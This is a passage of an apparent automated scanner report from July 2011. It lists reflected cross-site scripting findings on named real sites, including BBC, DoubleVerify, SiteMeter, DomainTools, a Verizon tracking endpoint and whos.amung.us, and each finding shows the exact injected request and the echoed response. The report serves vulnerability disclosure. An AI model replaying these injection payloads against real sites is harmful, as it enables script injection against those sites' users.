       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       u
...[SNIP]...

3.152. http://news.bbc.co.uk/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/football/14168601.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3339d'-alert(1)-'a2a06505956 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/football/14168601.stm?3339d'-alert(1)-'a2a06505956=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:41 GMT
Keep-Alive: timeout=5, max=785
Expires: Mon, 18 Jul 2011 02:19:41 GMT
Connection: close
Content-Length: 51951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955581000,
       editionToServe: 'international',
       queryString: '3339d'-alert(1)-'a2a06505956=1',
       referrer: null,
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       ur
...[SNIP]...

3.153. http://news.bbc.co.uk/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/golf/14178214.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b3d9'-alert(1)-'2c218cf9b1c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/golf/14178214.stm?5b3d9'-alert(1)-'2c218cf9b1c=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:08 GMT
Keep-Alive: timeout=5, max=741
Expires: Mon, 18 Jul 2011 02:20:08 GMT
Connection: close
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955608000,
       editionToServe: 'international',
       queryString: '5b3d9'-alert(1)-'2c218cf9b1c=1',
       referrer: null,
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/
...[SNIP]...

3.154. http://news.bbc.co.uk/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/motogp/14177052.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0774'-alert(1)-'96258bdb8b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/motogp/14177052.stm?b0774'-alert(1)-'96258bdb8b3=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:11 GMT
Keep-Alive: timeout=5, max=799
Expires: Mon, 18 Jul 2011 02:20:11 GMT
Connection: close
Content-Length: 53360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955611000,
       editionToServe: 'international',
       queryString: 'b0774'-alert(1)-'96258bdb8b3=1',
       referrer: null,
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
   
...[SNIP]...

3.155. http://news.bbc.co.uk/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3db0'-alert(1)-'d49f53f3de4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/rugby_union/welsh/14175299.stm?b3db0'-alert(1)-'d49f53f3de4=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:22 GMT
Keep-Alive: timeout=5, max=800
Expires: Mon, 18 Jul 2011 02:20:22 GMT
Connection: close
Content-Length: 48890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955622000,
       editionToServe: 'international',
       queryString: 'b3db0'-alert(1)-'d49f53f3de4=1',
       referrer: null,
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'stor
...[SNIP]...

3.156. http://rtb0.doubleverify.com/rtb.ashx/verifyc [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rtb0.doubleverify.com
Path:   /rtb.ashx/verifyc

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 2d9a3<script>alert(1)</script>a43c9ebe968 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /rtb.ashx/verifyc?ctx=741233&cmp=5022490&plc=65247669&sid=953455&num=5&ver=2&dv_url=http%3A//www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/&callback=__verify_callback_3801895873712d9a3<script>alert(1)</script>a43c9ebe968 HTTP/1.1
Host: rtb0.doubleverify.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/

Response

HTTP/1.1 200 OK
Connection: close
Content-Type: text/javascript; charset=utf-8
Server: Microsoft-IIS/7.0
Date: Mon, 18 Jul 2011 19:12:13 GMT
Content-Length: 74

__verify_callback_3801895873712d9a3<script>alert(1)</script>a43c9ebe968(2)

3.157. http://s49.sitemeter.com/js/counter.js [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s49.sitemeter.com
Path:   /js/counter.js

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95b6f'%3balert(1)//a1bad805d9 was submitted in the site parameter. This input was echoed as 95b6f';alert(1)//a1bad805d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/counter.js?site=s49redmondpie95b6f'%3balert(1)//a1bad805d9 HTTP/1.1
Host: s49.sitemeter.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Jul 2011 19:10:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7322
Content-Type: application/x-javascript
Expires: Mon, 18 Jul 2011 19:20:45 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServe
...[SNIP]...
ddEventListener(sEvent, func, false);
       else
           if (obj.attachEvent)
            obj.attachEvent( "on"+sEvent, func );
           else
               return false;
       return true;
   }

}

SiteMeter.init('s49redmondpie95b6f';alert(1)//a1bad805d9', 's49.sitemeter.com', '');

var g_sLastCodeName = 's49redmondpie95b6f';alert(1)//a1bad805d9';
// ]]>
...[SNIP]...

3.158. https://secure.domaintools.com/join/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5126"><a>5636737d81b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /joind5126"><a>5636737d81b/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:17:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:17:53 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=joind5126"><a>5636737d81b">
...[SNIP]...

3.159. https://secure.domaintools.com/join/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /join/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2231d<a>d37eab15273 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /join2231d<a>d37eab15273/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:18:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:18:21 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>d37eab15273">Whois record for "join2231d<a>d37eab15273"</a>
...[SNIP]...

3.160. https://secure.domaintools.com/log-in/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /log-in/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92168"><a>6a3fe2a15c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /log-in92168"><a>6a3fe2a15c7/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=log-in92168"><a>6a3fe2a15c7">
...[SNIP]...

3.161. https://secure.domaintools.com/log-in/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /log-in/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6d261<a>85e8fbdd7f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /log-in6d261<a>85e8fbdd7f2/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>85e8fbdd7f2">Whois record for "log-in6d261<a>85e8fbdd7f2"</a>
...[SNIP]...

3.162. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /shopping-cart/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98306"><a>183c19664cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /shopping-cart98306"><a>183c19664cb/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:16:38 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a href="http://domaintools.com/go/?service=whois&q=shopping-cart98306"><a>183c19664cb">
...[SNIP]...

3.163. https://secure.domaintools.com/shopping-cart/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.domaintools.com
Path:   /shopping-cart/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f7922<a>15d716d7dbb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /f7922<a>15d716d7dbb/ HTTP/1.1
Host: secure.domaintools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Mon, 18 Jul 2011 03:17:13 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html>
<head>
   <title>DomainTools: Page Not Found</title>
    <link rel="alternate" type="application/
...[SNIP]...
<a>15d716d7dbb">Whois record for "f7922<a>15d716d7dbb"</a>
...[SNIP]...

3.164. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://verizonwireless.tt.omtrdc.net
Path:   /m2/verizonwireless/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload ab504<script>alert(1)</script>dbf1c364134 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verizonwireless/mbox/standard?mboxHost=www.verizonwireless.com&mboxSession=1310993870949-319721&mboxPC=1310569554435-90226.17&mboxPage=1310994092251-573687&screenHeight=1200&screenWidth=1920&browserWidth=997&browserHeight=652&browserTimeOffset=-300&colorDepth=24&mboxXDomain=enabled&mboxCount=3&user.profile=B2C&entity.id=5635&entity.categoryId=Phone%2CPhone%3AAllPhonesAndDevices&ContractPeriod=2Yr&entity.name=HTC%20Trophy%26amp%3Btrade%3B&entity.type=PDA%2FSmartPhones&entity.make=HTC&entity.model=Trophy%26amp%3Btrade%3B&entity.pageURL=%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26amp%3Baction%3DviewPhoneDetail%26amp%3BselectedPhoneId%3D5635&entity.thumbnailURL=http%3A%2F%2Fcache.vzw.com%2Fimages_b2c%2Fphones%2Fmini%2Fhtc_trophy.png&entity.capabilities_96=false&entity.capabilities_147=false&entity.capabilities_150=true&entity.capabilities_193=false&entity.capabilities_194=false&entity.capabilities_198=false&entity.inventory=3435&entity.preorder=false&entity.ratings=4.6209&entity.reviews=306&entity.ratingURL=http%3A%2F%2Fcache.vzw.com%2Fimages_b2c%2Fshared%2Freviews%2Fsm_star_4_5.png&path=phoneFirst&loggedin=false&planId=0&mbox=productPage_Phone_Detailsab504<script>alert(1)</script>dbf1c364134&mboxId=0&mboxTime=1310976102252&mboxURL=http%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Fstore%2Fcontroller%3Fitem%3DphoneFirst%26action%3DviewPhoneDetail%26selectedPhoneId%3D5635&mboxReferrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&mboxVersion=39 HTTP/1.1
Host: verizonwireless.tt.omtrdc.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/store/controller?item=phoneFirst&action=viewPhoneDetail&selectedPhoneId=5635
Cookie: mboxPC=1310569554435-90226.17; mboxSession=1310993870949-319721

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1310569554435-90226.17; Domain=verizonwireless.tt.omtrdc.net; Expires=Mon, 01-Aug-2011 13:03:24 GMT; Path=/m2/verizonwireless
Content-Type: text/javascript
Content-Length: 220
Date: Mon, 18 Jul 2011 13:03:24 GMT
Server: Test & Target

mboxFactories.get('default').get('productPage_Phone_Detailsab504<script>alert(1)</script>dbf1c364134',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1310569554435-90226.17");

3.165. http://whos.amung.us/psrvwidget/ [i parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whos.amung.us
Path:   /psrvwidget/

Issue detail

The value of the i request parameter is copied into the HTML document as plain text between tags. The payload 4307b<script>alert(1)</script>fa525da0628 was submitted in the i parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /psrvwidget/?k=8gre&i=13f4342f4307b<script>alert(1)</script>fa525da0628&z=25414880 HTTP/1.1
Host: whos.amung.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: uid=CgH9C04khVAgVG3PetcqAg==

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:18:58 GMT
Content-Type: text/javascript
Connection: close
Server: Apache/1.1 (Windows 4.00.950)
Content-Length: 271

wau_populate_widget('13f4342f4307b<script>alert(1)</script>fa525da0628','<a href="http://whos.amung.us/pro/stats/8gre"><img src="+++://whos.amung.us***/pjswidget/:::&w=classic" class="wau_classic"bord
...[SNIP]...

3.166. http://whos.amung.us/psrvwidget/ [k parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://whos.amung.us
Path:   /psrvwidget/

Issue detail

The value of the k request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 928fd"><script>alert(1)</script>cfcf9b0c40d was submitted in the k parameter. This input was echoed as 928fd\"><script>alert(1)</script>cfcf9b0c40d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /psrvwidget/?k=8gre928fd"><script>alert(1)</script>cfcf9b0c40d&i=13f4342f&z=25414880 HTTP/1.1
Host: whos.amung.us
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: uid=CgH9C04khVAgVG3PetcqAg==

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:18:58 GMT
Content-Type: text/javascript
Connection: close
Server: Apache/1.1 (Windows 4.00.950)
Content-Length: 274

wau_populate_widget('13f4342f','<a href="http://whos.amung.us/pro/stats/8gre928fd\"><script>alert(1)</script>cfcf9b0c40d"><img src="+++://whos.amung.us***/pjswidget/:::&w=classic" class="wau_classic"b
...[SNIP]...

3.167. http://lookupserver.com/ [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://lookupserver.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 561e0<script>alert(1)</script>e04c3e53364 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: lookupserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)561e0<script>alert(1)</script>e04c3e53364
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 02:16:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Content-Length: 5703
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title
...[SNIP]...
<b>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)561e0<script>alert(1)</script>e04c3e53364</b>
...[SNIP]...

3.168. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7975'-alert(1)-'27a0b2dd17b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/from_our_own_correspondent/9538059.stm HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=d7975'-alert(1)-'27a0b2dd17b

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:58 GMT
Keep-Alive: timeout=5, max=798
